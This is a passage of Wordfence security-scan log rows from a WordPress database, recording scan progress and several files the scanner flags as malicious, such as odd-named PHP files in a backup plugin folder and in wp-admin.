scan'),(13105,1704985302.792290,2,'info','Analyzed 9400 files containing 86.93 MB of data so far'),(13104,1704985302.482016,2,'info','Analyzed 9300 files containing 86.73 MB of data so far'),(13103,1704985302.172456,2,'info','Analyzed 9200 files containing 86.59 MB of data so far'),(12961,1704985267.543317,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(12957,1704985267.512939,10,'info','SUM_ENDOK:Scanning to check available disk space'),(12958,1704985267.523213,10,'info','SUM_START:Checking Web Application Firewall status'),(12959,1704985267.527121,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(12960,1704985267.537539,10,'info','SUM_START:Checking for future GeoIP support'),(12956,1704985267.511151,2,'info','The disk has 1999655.23 MB available'),(12869,1704725326.570759,2,'info','Scanned contents of 2917 additional files at 11.74 per second'),(12870,1704725327.639041,2,'info','Scanned contents of 2931 additional files at 11.75 per second'),(12871,1704725328.725891,2,'info','Scanned contents of 2941 additional files at 11.74 per second'),(12872,1704725335.074440,2,'info','Scanned contents of 2957 additional files at 11.51 per second'),(12873,1704725338.369252,2,'info','Scanned contents of 2960 additional files at 11.37 per second'),(12874,1704725339.111700,2,'info','Scanned contents of 2980 additional files at 11.42 per second'),(12875,1704725339.112504,2,'info','Asking Wordfence to check URLs against malware list.'),(12876,1704725339.144480,2,'info','Checking 6672 host keys against Wordfence scanning servers.'),(12877,1704725339.503299,2,'info','Done host key check.'),(12878,1704725339.813070,2,'info','Done file contents scan'),(12879,1704725339.815881,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/plugins/backup-backup/includes/2797806595...php'),(12880,1704725339.821071,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/plugins/backup-backup/includes/3688038378...php'),(12881,1704725339.824547,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/plugins/backup-backup/includes/CTY@x7root.php'),(12882,1704725339.828348,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/plugins/backup-backup/includes/Mzc@x7root.php'),(12883,1704725339.831879,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/plugins/backup-backup/includes/bsP@x7root.php'),(12884,1704725339.834901,2,'info','Adding issue: File appears to be malicious or unsafe: settings.php'),(12903,1704725341.274735,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(12902,1704725341.263559,10,'info','SUM_ENDOK:Scanning for weak passwords'),(12901,1704725341.231620,2,'info','Starting password strength check on 3 users.'),(12900,1704725341.223785,10,'info','SUM_START:Scanning for weak passwords'),(12899,1704725341.209903,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(12898,1704725341.092899,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(12897,1704725341.076784,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(12896,1704725341.070020,2,'info','Done examining URLs'),(12895,1704725341.068815,2,'info','Done host key check.'),(12894,1704725340.756033,2,'info','Checking 1123 host keys against Wordfence scanning servers.'),(12893,1704725340.748127,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(12892,1704725339.899785,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(12891,1704725339.883962,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(12890,1704725339.865477,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(12889,1704725339.852746,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(12888,1704725339.845738,10,'info','SUM_ENDBAD:Scanning file contents for infections and vulnerabilities'),(12887,1704725339.843112,2,'info','Adding issue: File appears to be malicious or unsafe: wp-includes/7BwY2shWSAb.php'),(12799,1704725243.343118,2,'info','Scanned contents of 1887 additional files at 11.42 per second'),(12800,1704725244.348103,2,'info','Scanned contents of 1917 additional files at 11.53 per second'),(12801,1704725245.364173,2,'info','Scanned contents of 1948 additional files at 11.65 per second'),(12802,1704725246.382821,2,'info','Scanned contents of 1981 additional files at 11.77 per second'),(12803,1704725247.403471,2,'info','Scanned contents of 2012 additional files at 11.89 per second'),(12804,1704725248.432311,2,'info','Scanned contents of 2046 additional files at 12.01 per second'),(12805,1704725249.434319,2,'info','Scanned contents of 2079 additional files at 12.14 per second'),(12806,1704725250.445804,2,'info','Scanned contents of 2112 additional files at 12.26 per second'),(12807,1704725251.970118,2,'info','Scanned contents of 2124 additional files at 12.22 per second'),(12808,1704725256.577786,2,'info','Scanned contents of 2135 additional files at 11.96 per second'),(12809,1704725258.525990,2,'info','Scanned contents of 2137 additional files at 11.85 per second'),(12810,1704725259.777159,2,'info','Scanned contents of 2144 additional files at 11.80 per second'),(12811,1704725261.031239,2,'info','Scanned contents of 2152 additional files at 11.77 per second'),(12812,1704725264.323939,2,'info','Scanned contents of 2156 additional files at 11.58 per second'),(12813,1704725265.386665,2,'info','Scanned contents of 2168 additional files at 11.58 per second'),(12814,1704725266.420891,2,'info','Scanned contents of 2180 additional files at 11.58 per second'),(12815,1704725267.471711,2,'info','Scanned contents of 2200 additional files at 11.62 per second'),(12816,1704725268.497289,2,'info','Scanned contents of 2218 additional files at 11.65 per second'),(12817,1704725269.539512,2,'info','Scanned contents of 2232 additional files at 11.66 per second'),(12818,1704725270.569624,2,'info','Scanned contents of 2247 additional files at 11.68 per second'),(12819,1704725271.595461,2,'info','Scanned contents of 2262 additional files at 11.69 per second'),(12820,1704725272.676409,2,'info','Scanned contents of 2278 additional files at 11.71 per second'),(12821,1704725273.681774,2,'info','Scanned contents of 2295 additional files at 11.74 per second'),(12822,1704725274.734278,2,'info','Scanned contents of 2309 additional files at 11.74 per second'),(13407,1704985564.666608,10,'info','SUM_FINAL:Scan complete. You have 33 new issues to fix. See below.'),(13406,1704985564.665642,1,'info','Scan Complete. Scanned 16429 files, 15 plugins, 9 themes, 254 posts, 53 comments and 6457 URLs in 5 minutes 4 seconds.'),(13405,1704985564.660889,2,'info','Wordfence used 41.78 MB of memory for scan. Server peak memory usage was: 128.78 MB'),(13404,1704985564.659724,1,'info','-------------------'),(12840,1704725294.549663,2,'info','Scanned contents of 2520 additional files at 11.64 per second'),(12839,1704725293.345929,2,'info','Scanned contents of 2513 additional files at 11.68 per second'),(12838,1704725292.333870,2,'info','Scanned contents of 2500 additional files at 11.67 per second'),(12837,1704725291.323653,2,'info','Scanned contents of 2493 additional files at 11.69 per second'),(12836,1704725290.278957,2,'info','Scanned contents of 2487 additional files at 11.72 per second'),(12835,1704725289.232162,2,'info','Scanned contents of 2481 additional files at 11.75 per second'),(12832,1704725285.818637,2,'info','Scanned contents of 2437 additional files at 11.73 per second'),(12833,1704725286.855405,2,'info','Scanned contents of 2455 additional files at 11.76 per second'),(12834,1704725287.990412,2,'info','Scanned contents of 2478 additional files at 11.81 per second'),(13403,1704985564.651532,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(13402,1704985564.648506,2,'info','Done examining URLs'),(13401,1704985564.647481,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(13400,1704985564.639721,10,'info','SUM_START:Scanning for suspicious site options'),(13399,1704985564.629925,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(13398,1704985564.318039,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(13397,1704985564.305692,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(13396,1704985560.785403,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(13395,1704985560.774684,10,'info','SUM_ENDOK:Scanning for weak passwords'),(13394,1704985560.745114,2,'info','Starting password strength check on 3 users.'),(13393,1704985560.738912,10,'info','SUM_START:Scanning for weak passwords'),(13392,1704985560.726900,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(13391,1704985560.611013,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(13390,1704985560.598028,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(13389,1704985560.594510,2,'info','Done examining URLs'),(13388,1704985560.593440,2,'info','Done host key check.'),(13387,1704985560.289888,2,'info','Checking 1123 host keys against Wordfence scanning servers.'),(13386,1704985560.280901,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(13385,1704985559.584715,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(13384,1704985559.571890,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(13383,1704985559.567395,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(13382,1704985559.557681,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(13381,1704985559.551894,10,'info','SUM_ENDBAD:Scanning file contents for infections and vulnerabilities'),(13380,1704985559.549416,2,'info','Adding issue: File appears to be malicious or unsafe: wp-includes/7BwY2shWSAb.php'),(13379,1704985559.546195,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/network/theme-insnqkr.php'),(13378,1704985559.543754,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/TFWk17JbsY5.php'),(13377,1704985559.539945,2,'info','Adding issue: File appears to be malicious or unsafe: settings.php'),(13376,1704985559.537503,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/plugins/backup-backup/includes/bsP@x7root.php'),(13375,1704985559.535247,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/plugins/backup-backup/includes/Mzc@x7root.php'),(13374,1704985559.533030,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/plugins/backup-backup/includes/CTY@x7root.php'),(13373,1704985559.530856,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/plugins/backup-backup/includes/3688038378...php'),(13372,1704985559.527472,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/plugins/backup-backup/includes/2797806595...php'),(13371,1704985559.525060,2,'info','Done file contents scan'),(13370,1704985559.220757,2,'info','Done host key check.'),(13369,1704985558.854145,2,'info','Checking 6836 host keys against Wordfence scanning servers.'),(13368,1704985558.819357,2,'info','Asking Wordfence to check URLs against malware list.'),(13367,1704985558.818721,2,'info','Scanned contents of 3095 additional files at 13.62 per second'),(13366,1704985558.253741,2,'info','Scanned contents of 3075 additional files at 13.56 per second'),(13365,1704985555.381553,2,'info','Scanned contents of 3072 additional files at 13.72 per second'),(13364,1704985552.619455,2,'info','Scanned contents of 3069 additional files at 13.88 per second'),(13337,1704985522.085218,2,'info','Scanned contents of 2671 additional files at 14.01 per second'),(13338,1704985523.200634,2,'info','Scanned contents of 2677 additional files at 13.96 per second'),(13339,1704985524.304529,2,'info','Scanned contents of 2684 additional files at 13.92 per second'),(13340,1704985525.501699,2,'info','Scanned contents of 2689 additional files at 13.86 per second'),(13341,1704985526.559031,2,'info','Scanned contents of 2701 additional files at 13.85 per second'),(13342,1704985527.584717,2,'info','Scanned contents of 2721 additional files at 13.88 per second'),(13343,1704985528.593844,2,'info','Scanned contents of 2747 additional files at 13.94 per second'),(13344,1704985529.796977,2,'info','Scanned contents of 2763 additional files at 13.93 per second'),(13345,1704985530.825207,2,'info','Scanned contents of 2779 additional files at 13.94 per second'),(13346,1704985531.877602,2,'info','Scanned contents of 2792 additional files at 13.93 per second'),(13347,1704985532.905077,2,'info','Scanned contents of 2806 additional files at 13.93 per second'),(13348,1704985533.999027,2,'info','Scanned contents of 2825 additional files at 13.95 per second'),(13349,1704985535.021694,2,'info','Scanned contents of 2844 additional files at 13.97 per second'),(13350,1704985536.088577,2,'info','Scanned contents of 2858 additional files at 13.97 per second'),(13351,1704985537.092187,2,'info','Scanned contents of 2875 additional files at 13.98 per second'),(13352,1704985538.128084,2,'info','Scanned contents of 2892 additional files at 14.00 per second'),(13353,1704985539.172296,2,'info','Scanned contents of 2910 additional files at 14.01 per second'),(13354,1704985540.232260,2,'info','Scanned contents of 2924 additional files at 14.01 per second'),(13355,1704985541.235496,2,'info','Scanned contents of 2943 additional files at 14.03 per second'),(13356,1704985542.404040,2,'info','Scanned contents of 2960 additional files at 14.03 per second'),(13357,1704985543.493307,2,'info','Scanned contents of 2968 additional files at 14.00 per second'),(13358,1704985546.315967,2,'info','Scanned contents of 2970 additional files at 13.83 per second'),(13359,1704985547.346727,2,'info','Scanned contents of 2987 additional files at 13.84 per second'),(13360,1704985548.394589,2,'info','Scanned contents of 2997 additional files at 13.82 per second'),(13361,1704985549.410224,2,'info','Scanned contents of 3023 additional files at 13.87 per second'),(13362,1704985550.488649,2,'info','Scanned contents of 3036 additional files at 13.86 per second'),(13363,1704985551.587708,2,'info','Scanned contents of 3050 additional files at 13.86 per second'),(12798,1704725242.337131,2,'info','Scanned contents of 1858 additional files at 11.31 per second'),(12792,1704725234.864626,2,'info','Scanned contents of 1690 additional files at 10.78 per second'),(12793,1704725235.890452,2,'info','Scanned contents of 1724 additional files at 10.93 per second'),(12794,1704725238.296416,2,'info','Scanned contents of 1728 additional files at 10.79 per second'),(12795,1704725239.308365,2,'info','Scanned contents of 1759 additional files at 10.91 per second'),(12796,1704725240.314947,2,'info','Scanned contents of 1792 additional files at 11.05 per second'),(12797,1704725241.336204,2,'info','Scanned contents of 1825 additional files at 11.18 per second'),(12885,1704725339.837755,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/TFWk17JbsY5.php'),(12886,1704725339.840412,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/network/theme-insnqkr.php'),(12849,1704725304.708446,2,'info','Scanned contents of 2608 additional files at 11.51 per second'),(12962,1704985267.557439,10,'info','SUM_START:Checking for paths skipped due to scan settings'),(12963,1704985267.572589,10,'info','SUM_ENDOK:Checking for paths skipped due to scan settings'),(12964,1704985267.582053,2,'info','Getting plugin list from WordPress'),(12965,1704985268.126671,2,'info','Found 15 plugins'),(12463,1704725005.882746,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(12462,1704725005.876187,10,'info','SUM_START:Scanning for known malware files'),(12461,1704725005.872915,10,'info','SUM_DISABLED:Skipping plugin scan'),(12460,1704725005.871768,10,'info','SUM_DISABLED:Skipping theme scan'),(12458,1704725005.859394,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(12459,1704725005.867475,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(12457,1704725005.855853,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(12456,1704725005.847916,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(12455,1704725005.841984,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(13408,1704989104.047107,10,'info','SUM_PREP:Preparing a new scan.'),(13409,1704989104.051608,1,'info','Initiating quick scan'),(13410,1704989104.055280,10,'info','SUM_START:Checking Web Application Firewall status'),(13411,1704989104.056321,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(13412,1704989104.063266,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(13413,1704989104.268205,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(13414,1704989104.272578,1,'info','-------------------'),(13415,1704989104.274195,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 87 MB'),(13416,1704989104.277805,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(13417,1704989104.278781,10,'info','SUM_FINAL:Scan complete. You have 17 new issues to fix. See below.'),(12848,1704725303.655663,2,'info','Scanned contents of 2592 additional files at 11.49 per second'),(12847,1704725302.613972,2,'info','Scanned contents of 2577 additional files at 11.48 per second'),(12846,1704725301.564953,2,'info','Scanned contents of 2571 additional files at 11.51 per second'),(12845,1704725300.215462,2,'info','Scanned contents of 2564 additional files at 11.54 per second'),(12844,1704725299.043826,2,'info','Scanned contents of 2557 additional files at 11.57 per second'),(12843,1704725297.844437,2,'info','Scanned contents of 2546 additional files at 11.59 per second'),(12842,1704725296.831849,2,'info','Scanned contents of 2539 additional files at 11.61 per second'),(12841,1704725295.582076,2,'info','Scanned contents of 2526 additional files at 11.62 per second'),(12775,1704725217.551039,2,'info','Scanned contents of 1222 additional files at 8.76 per second'),(12774,1704725216.543079,2,'info','Scanned contents of 1200 additional files at 8.67 per second'),(12773,1704725215.526407,2,'info','Scanned contents of 1176 additional files at 8.56 per second'),(12772,1704725214.487426,2,'info','Scanned contents of 1152 additional files at 8.45 per second'),(12771,1704725213.470518,2,'info','Scanned contents of 1125 additional files at 8.31 per second'),(12770,1704725212.453437,2,'info','Scanned contents of 1097 additional files at 8.17 per second'),(12769,1704725211.419204,2,'info','Scanned contents of 1063 additional files at 7.97 per second'),(12768,1704725210.393384,2,'info','Scanned contents of 1029 additional files at 7.78 per second'),(12767,1704725209.371103,2,'info','Scanned contents of 997 additional files at 7.60 per second'),(12766,1704725208.362531,2,'info','Scanned contents of 966 additional files at 7.42 per second'),(12765,1704725207.336219,2,'info','Scanned contents of 934 additional files at 7.23 per second'),(12764,1704725206.335992,2,'info','Scanned contents of 902 additional files at 7.03 per second'),(12763,1704725205.301069,2,'info','Scanned contents of 872 additional files at 6.86 per second'),(12762,1704725204.300116,2,'info','Scanned contents of 842 additional files at 6.67 per second'),(12761,1704725203.290599,2,'info','Scanned contents of 820 additional files at 6.55 per second'),(12760,1704725202.275414,2,'info','Scanned contents of 818 additional files at 6.59 per second'),(12759,1704725201.166824,2,'info','Scanned contents of 816 additional files at 6.63 per second'),(12758,1704725198.573568,2,'info','Scanned contents of 815 additional files at 6.77 per second'),(12757,1704725197.475413,2,'info','Scanned contents of 811 additional files at 6.79 per second'),(12756,1704725195.494761,2,'info','Scanned contents of 807 additional files at 6.88 per second'),(12755,1704725194.254117,2,'info','Scanned contents of 801 additional files at 6.90 per second'),(12754,1704725193.147236,2,'info','Scanned contents of 796 additional files at 6.92 per second'),(12753,1704725191.939347,2,'info','Scanned contents of 785 additional files at 6.90 per second'),(12752,1704725190.938787,2,'info','Scanned contents of 781 additional files at 6.92 per second'),(12751,1704725187.606288,2,'info','Scanned contents of 777 additional files at 7.10 per second'),(12750,1704725186.577027,2,'info','Scanned contents of 768 additional files at 7.08 per second'),(12749,1704725185.554202,2,'info','Scanned contents of 767 additional files at 7.14 per second'),(12748,1704725184.157346,2,'info','Scanned contents of 765 additional files at 7.21 per second'),(12747,1704725182.706616,2,'info','Scanned contents of 764 additional files at 7.30 per second'),(12746,1704725181.585615,2,'info','Scanned contents of 760 additional files at 7.35 per second'),(12745,1704725180.340554,2,'info','Scanned contents of 752 additional files at 7.36 per second'),(12744,1704725179.321360,2,'info','Scanned contents of 737 additional files at 7.28 per second'),(12743,1704725178.290743,2,'info','Scanned contents of 719 additional files at 7.18 per second'),(12742,1704725175.435602,2,'info','Scanned contents of 713 additional files at 7.33 per second'),(12741,1704725167.440402,2,'info','Scanned contents of 712 additional files at 7.97 per second'),(12740,1704725166.421882,2,'info','Scanned contents of 709 additional files at 8.03 per second'),(12739,1704725165.249145,2,'info','Scanned contents of 700 additional files at 8.03 per second'),(12738,1704725163.859644,2,'info','Scanned contents of 697 additional files at 8.13 per second'),(12737,1704725162.268282,2,'info','Scanned contents of 692 additional files at 8.22 per second'),(12736,1704725158.280802,2,'info','Scanned contents of 685 additional files at 8.55 per second'),(12735,1704725157.259946,2,'info','Scanned contents of 672 additional files at 8.49 per second'),(12734,1704725156.187339,2,'info','Scanned contents of 660 additional files at 8.45 per second'),(12733,1704725155.176203,2,'info','Scanned contents of 651 additional files at 8.45 per second'),(12732,1704725154.079193,2,'info','Scanned contents of 640 additional files at 8.43 per second'),(12731,1704725153.027339,2,'info','Scanned contents of 626 additional files at 8.36 per second'),(12730,1704725152.003436,2,'info','Scanned contents of 614 additional files at 8.31 per second'),(12729,1704725150.984117,2,'info','Scanned contents of 603 additional files at 8.28 per second'),(12728,1704725149.905435,2,'info','Scanned contents of 592 additional files at 8.25 per second'),(12727,1704725148.844989,2,'info','Scanned contents of 581 additional files at 8.21 per second'),(12726,1704725147.803726,2,'info','Scanned contents of 572 additional files at 8.21 per second'),(12725,1704725146.783853,2,'info','Scanned contents of 560 additional files at 8.16 per second'),(12724,1704725145.771995,2,'info','Scanned contents of 550 additional files at 8.13 per second'),(12723,1704725144.737283,2,'info','Scanned contents of 537 additional files at 8.06 per second'),(12722,1704725143.662661,2,'info','Scanned contents of 525 additional files at 8.01 per second'),(12721,1704725142.467623,2,'info','Scanned contents of 517 additional files at 8.03 per second'),(12720,1704725139.652007,2,'info','Scanned contents of 514 additional files at 8.35 per second'),(12719,1704725138.530461,2,'info','Scanned contents of 504 additional files at 8.34 per second'),(12718,1704725136.162756,2,'info','Scanned contents of 502 additional files at 8.65 per second'),(12717,1704725135.094004,2,'info','Scanned contents of 494 additional files at 8.67 per second'),(12716,1704725134.035594,2,'info','Scanned contents of 487 additional files at 8.71 per second'),(12715,1704725132.848298,2,'info','Scanned contents of 480 additional files at 8.77 per second'),(12714,1704725131.726088,2,'info','Scanned contents of 474 additional files at 8.84 per second'),(12713,1704725130.675070,2,'info','Scanned contents of 463 additional files at 8.81 per second'),(12712,1704725129.672752,2,'info','Scanned contents of 452 additional files at 8.77 per second'),(12711,1704725128.655364,2,'info','Scanned contents of 442 additional files at 8.75 per second'),(12710,1704725127.617336,2,'info','Scanned contents of 430 additional files at 8.69 per second'),(12709,1704725126.589883,2,'info','Scanned contents of 418 additional files at 8.62 per second'),(12708,1704725125.532610,2,'info','Scanned contents of 405 additional files at 8.54 per second'),(12707,1704725124.496521,2,'info','Scanned contents of 393 additional files at 8.47 per second'),(12706,1704725123.433067,2,'info','Scanned contents of 384 additional files at 8.47 per second'),(12705,1704725122.123782,2,'info','Scanned contents of 378 additional files at 8.59 per second'),(12704,1704725120.993231,2,'info','Scanned contents of 371 additional files at 8.65 per second'),(12703,1704725119.929574,2,'info','Scanned contents of 364 additional files at 8.71 per second'),(12702,1704725118.927374,2,'info','Scanned contents of 357 additional files at 8.75 per second'),(12701,1704725117.822675,2,'info','Scanned contents of 350 additional files at 8.82 per second'),(12700,1704725116.748426,2,'info','Scanned contents of 342 additional files at 8.85 per second'),(12699,1704725115.693610,2,'info','Scanned contents of 328 additional files at 8.73 per second'),(12698,1704725114.641163,2,'info','Scanned contents of 318 additional files at 8.71 per second'),(12697,1704725113.555547,2,'info','Scanned contents of 308 additional files at 8.69 per second'),(12696,1704725112.454675,2,'info','Scanned contents of 296 additional files at 8.62 per second'),(12695,1704725111.413523,2,'info','Scanned contents of 285 additional files at 8.56 per second'),(12694,1704725110.310581,2,'info','Scanned contents of 275 additional files at 8.54 per second'),(12693,1704725109.218268,2,'info','Scanned contents of 272 additional files at 8.75 per second'),(12692,1704725108.188298,2,'info','Scanned contents of 262 additional files at 8.71 per second'),(12691,1704725106.795184,2,'info','Scanned contents of 249 additional files at 8.68 per second'),(12690,1704725105.731807,2,'info','Scanned contents of 239 additional files at 8.66 per second'),(12689,1704725104.620199,2,'info','Scanned contents of 228 additional files at 8.60 per second'),(12688,1704725103.585643,2,'info','Scanned contents of 219 additional files at 8.60 per second'),(12687,1704725102.536983,2,'info','Scanned contents of 200 additional files at 8.19 per second'),(12686,1704725101.487080,2,'info','Scanned contents of 181 additional files at 7.75 per second'),(12685,1704725100.467168,2,'info','Scanned contents of 160 additional files at 7.16 per second'),(12684,1704725099.455859,2,'info','Scanned contents of 143 additional files at 6.70 per second'),(12683,1704725097.960442,2,'info','Scanned contents of 134 additional files at 6.75 per second'),(12682,1704725096.885507,2,'info','Scanned contents of 128 additional files at 6.82 per second'),(12681,1704725095.042940,2,'info','Scanned contents of 126 additional files at 7.44 per second'),(12680,1704725090.574947,2,'info','Scanned contents of 115 additional files at 9.23 per second'),(12679,1704725089.559602,2,'info','Scanned contents of 106 additional files at 9.27 per second'),(12678,1704725088.087442,2,'info','Scanned contents of 94 additional files at 9.43 per second'),(12677,1704725087.077832,2,'info','Scanned contents of 68 additional files at 7.59 per second'),(12676,1704725086.050637,2,'info','Scanned contents of 56 additional files at 7.06 per second'),(12675,1704725084.694341,2,'info','Scanned contents of 54 additional files at 8.21 per second'),(12674,1704725083.362756,2,'info','Scanned contents of 52 additional files at 9.92 per second'),(12673,1704725082.329550,2,'info','Scanned contents of 46 additional files at 10.92 per second'),(12672,1704725081.233113,2,'info','Scanned contents of 39 additional files at 12.52 per second'),(12671,1704725080.169964,2,'info','Scanned contents of 28 additional files at 13.65 per second'),(12670,1704725079.138867,2,'info','Scanned contents of 12 additional files at 11.76 per second'),(12669,1704725078.115358,2,'info','Starting scan of file contents'),(12668,1704725077.311807,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(12667,1704725077.308217,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(12666,1704725077.295827,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(12665,1704725076.805532,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(12664,1704725076.789445,10,'info','SUM_ENDOK:Scanning for known malware files'),(12663,1704725076.783062,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(12662,1704725076.776139,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(12661,1704725076.775313,2,'info','Analyzed 16453 files containing 203.62 MB of data.'),(12660,1704725075.866024,2,'info','Analyzed 16400 files containing 202.72 MB of data so far'),(12659,1704725075.513046,2,'info','Analyzed 16300 files containing 201.44 MB of data so far'),(12658,1704725075.213465,2,'info','Analyzed 16200 files containing 199.4 MB of data so far'),(12657,1704725074.754308,2,'info','Analyzed 16100 files containing 195.33 MB of data so far'),(12656,1704725074.310240,2,'info','Analyzed 16000 files containing 192.9 MB of data so far'),(12655,1704725073.893398,2,'info','Analyzed 15900 files containing 191.52 MB of data so far'),(12654,1704725073.394303,2,'info','Analyzed 15800 files containing 187.66 MB of data so far'),(12653,1704725072.577273,2,'info','Analyzed 15700 files containing 170.2 MB of data so far'),(12652,1704725072.240455,2,'info','Analyzed 15600 files containing 169.04 MB of data so far'),(12651,1704725071.871528,2,'info','Analyzed 15500 files containing 167.91 MB of data so far'),(12650,1704725071.403202,2,'info','Analyzed 15400 files containing 165.13 MB of data so far'),(12649,1704725071.034012,2,'info','Analyzed 15300 files containing 162.7 MB of data so far'),(12648,1704725070.706786,2,'info','Analyzed 15200 files containing 161.85 MB of data so far'),(12647,1704725070.426481,2,'info','Analyzed 15100 files containing 161.64 MB of data so far'),(12646,1704725070.115016,2,'info','Analyzed 15000 files containing 161.54 MB of data so far'),(12645,1704725069.807589,2,'info','Analyzed 14900 files containing 161.35 MB of data so far'),(12644,1704725069.471162,2,'info','Analyzed 14800 files containing 161.06 MB of data so far'),(12643,1704725069.176887,2,'info','Analyzed 14700 files containing 160.8 MB of data so far'),(12642,1704725068.908047,2,'info','Analyzed 14600 files containing 160.53 MB of data so far'),(12641,1704725068.648247,2,'info','Analyzed 14500 files containing 159.73 MB of data so far'),(12640,1704725068.317077,2,'info','Analyzed 14400 files containing 158.12 MB of data so far'),(12639,1704725067.986278,2,'info','Analyzed 14300 files containing 157.41 MB of data so far'),(12638,1704725067.634866,2,'info','Analyzed 14200 files containing 156.06 MB of data so far'),(12637,1704725067.210098,2,'info','Analyzed 14100 files containing 153.23 MB of data so far'),(12636,1704725066.851960,2,'info','Analyzed 14000 files containing 152.33 MB of data so far'),(12635,1704725066.450203,2,'info','Analyzed 13900 files containing 150.97 MB of data so far'),(12634,1704725065.978837,2,'info','Analyzed 13800 files containing 147.33 MB of data so far'),(12633,1704725065.627816,2,'info','Analyzed 13700 files containing 146.39 MB of data so far'),(12632,1704725064.949225,2,'info','Analyzed 13600 files containing 138.45 MB of data so far'),(12631,1704725064.591555,2,'info','Analyzed 13500 files containing 137.37 MB of data so far'),(12630,1704725064.137934,2,'info','Analyzed 13400 files containing 133.95 MB of data so far'),(12629,1704725063.677336,2,'info','Analyzed 13300 files containing 131.41 MB of data so far'),(12628,1704725063.283323,2,'info','Analyzed 13200 files containing 129.67 MB of data so far'),(12627,1704725062.840106,2,'info','Analyzed 13100 files containing 127.83 MB of data so far'),(12626,1704725062.521843,2,'info','Analyzed 13000 files containing 127.13 MB of data so far'),(12625,1704725062.206690,2,'info','Analyzed 12900 files containing 126.83 MB of data so far'),(12624,1704725061.870147,2,'info','Analyzed 12800 files containing 126.48 MB of data so far'),(12623,1704725061.520283,2,'info','Analyzed 12700 files containing 124.82 MB of data so far'),(12622,1704725061.089493,2,'info','Analyzed 12600 files containing 122.19 MB of data so far'),(12621,1704725060.738773,2,'info','Analyzed 12500 files containing 121.45 MB of data so far'),(12620,1704725060.406440,2,'info','Analyzed 12400 files containing 120.49 MB of data so far'),(12619,1704725059.932831,2,'info','Analyzed 12300 files containing 118.71 MB of data so far'),(12618,1704725059.424513,2,'info','Analyzed 12200 files containing 111.34 MB of data so far'),(12617,1704725059.012889,2,'info','Analyzed 12100 files containing 109.39 MB of data so far'),(12616,1704725058.608819,2,'info','Analyzed 12000 files containing 107.77 MB of data so far'),(12615,1704725058.291166,2,'info','Analyzed 11900 files containing 107.48 MB of data so far'),(12614,1704725057.943073,2,'info','Analyzed 11800 files containing 106.88 MB of data so far'),(12613,1704725057.624920,2,'info','Analyzed 11700 files containing 106.59 MB of data so far'),(12612,1704725057.313207,2,'info','Analyzed 11600 files containing 105.73 MB of data so far'),(12611,1704725057.002656,2,'info','Analyzed 11500 files containing 105.54 MB of data so far'),(12610,1704725056.676783,2,'info','Analyzed 11400 files containing 105.15 MB of data so far'),(12609,1704725056.339075,2,'info','Analyzed 11300 files containing 104.43 MB of data so far'),(12608,1704725055.987874,2,'info','Analyzed 11200 files containing 104.03 MB of data so far'),(12607,1704725055.662368,2,'info','Analyzed 11100 files containing 103.56 MB of data so far'),(12606,1704725055.290995,2,'info','Analyzed 11000 files containing 102.69 MB of data so far'),(12605,1704725054.905932,2,'info','Analyzed 10900 files containing 102.33 MB of data so far'),(12604,1704725054.568490,2,'info','Analyzed 10800 files containing 102.09 MB of data so far'),(12603,1704725054.224906,2,'info','Analyzed 10700 files containing 101.54 MB of data so far'),(12602,1704725053.919611,2,'info','Analyzed 10600 files containing 101.21 MB of data so 